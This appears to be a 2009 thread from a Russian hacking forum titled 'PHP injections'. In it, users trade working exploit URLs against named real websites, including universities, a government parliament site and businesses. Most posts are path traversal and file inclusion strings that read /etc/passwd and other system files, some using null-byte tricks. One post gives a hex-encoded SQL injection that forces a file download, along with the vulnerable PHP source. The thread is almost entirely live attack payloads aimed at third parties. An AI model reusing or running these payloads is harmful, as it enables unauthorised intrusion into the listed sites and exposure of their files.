PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    http://pvp-game.ru/index.php?act=../index цикл index.php
     
  2. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

    Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

    Code:
    http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--
    Идёт файл на загрузку, в имени файла вывод:

    5.0.51a-3ubuntu5.4

    подставим своё значение:
    magic qutes = on, поэжтому захексим

    Code:
    http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--
    И скачиваем /etc/passwd :)

    presentations.php

    PHP:
        error_reporting(0);
        
    mysql_connect("localhost","*","*");
        
    mysql_select_db"owls08" );
        
    error_reporting(1);

        
    $id mysql_real_escape_string$_REQUEST['id'] );

        
    $query="SELECT file from presentations where id=$id";
        
    $result mysql_query$query ) or die( mysql_error() );
        
    $row mysql_fetch_array$result );

        
    $file $row['file'];
        
        
    header("Pragma: public");
        
    header("Expires: 0");
        
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

        
    header("Content-Type: application/force-download");
        
    header"Content-Disposition: attachment; filename=".basename($file));
        
    header("Content-Transfer-Encoding: binary");
        
    header("Content-Length: ".filesize($file));
        
    header"Content-Description: File Transfer");
        @
    readfile($file); 
     
    2 people like this.
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
    http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd
     
    3 people like this.
  4. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Code:
    http://www.duma.gov.ru/index.jsp?t=./index.jsp
     
    6 people like this.
  5. DFrost

    DFrost Member

    Joined:
    5 Jun 2009
    Messages:
    18
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://www.summerschoolalpbach.at/index.php?file=index.php
    Code:
    http://www.b2match.com/watervienna09/index.php?file=index.php
    Code:
    http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd
     
    #965 DFrost, 13 Sep 2009
    Last edited: 13 Sep 2009
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://sdm.mit.edu/index.php?fileName=index.php
     
  7. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://stroycement.ru/stat.php?p=../../../../etc/passwd
     
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://dnfo.ru/page.php?p=../page
    http://www.kamp.ru/page.php?p=page&board=1
     
    _________________________
    #968 HAXTA4OK, 19 Sep 2009
    Last edited: 19 Sep 2009
    1 person likes this.
  9. DFrost

    DFrost Member

    Joined:
    5 Jun 2009
    Messages:
    18
    Likes Received:
    23
    Reputations:
    0
    European investment banking firm
    Code:
    http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd
     
    #969 DFrost, 19 Sep 2009
    Last edited: 19 Sep 2009
    1 person likes this.
  10. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd
     
    #970 DeepBlue7, 26 Sep 2009
    Last edited by a moderator: 26 Sep 2009
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.gnpbu.ru/index.php?file=../index.php
    http://wnr.economicus.ru/index.php?file=../index
    http://www.eximoforta.ru/index.php?file=index.php

    Code:
    www.oUNIX.ru     -    о UNIX-системах.
    http://www.ounix.ru/index.php?page=../admin/index&id=8

    la2
    http://la2rasta.ru/index.php?f=index
     
    _________________________
    #971 HAXTA4OK, 26 Sep 2009
    Last edited: 26 Sep 2009
  12. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    http://www.physics.carleton.ca/atlas/index.php?file=../../../../../../../../../../../etc/passwd
    
    http://www.abei.it/index.php?file=../../../../../../../../../../../etc/passwd&sezione=Convegno%20Nazionale%202008&menu=Programma
    
    http://www.enterprise-europe-network.ch/marketplace/index.php?file=../../../../../../../../../../../etc/passwd
     
    #972 DeepBlue7, 27 Sep 2009
    Last edited: 27 Sep 2009
    1 person likes this.
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://mypara.ru/index.php?page=index
    http://www.autodafe.ru/index.php?page=../index
     
    _________________________
    #973 HAXTA4OK, 27 Sep 2009
    Last edited: 28 Sep 2009
    1 person likes this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    http://wework.philaforum.com/index.php?site=http://google.com/search?q=
     
    2 people like this.
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.ruvr.ru/index.php?lng=../../../../../../../../../../../../../../etc/passwd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
     
    3 people like this.
  16. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    http://www.myperfecthalf.com/forum/topic.php?topic_id=364&language_id=../../../../../../etc/passwd%00
     
    2 people like this.
  17. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Code:
    http://www.myperfecthalf.com/member/toprated_list.php?view_mode=gallery&language_id=../../../../../../etc/passwd%00&page=32&command=online
    http://kneuro.net/littlesite/index.php?file=/etc/passwd
    
     
  18. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://www.prodisney.ru/index.php?page=index.php
     
  19. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Code:
    http://www.automoto66.ru/index.php?state=other&file=../../../../../../etc/passwd&page=2
    http://www.mainechiropractic.org/index.php?file=/etc/passwd%00
     
    2 people like this.
  20. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    Code:
    http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00
     
    3 people like this.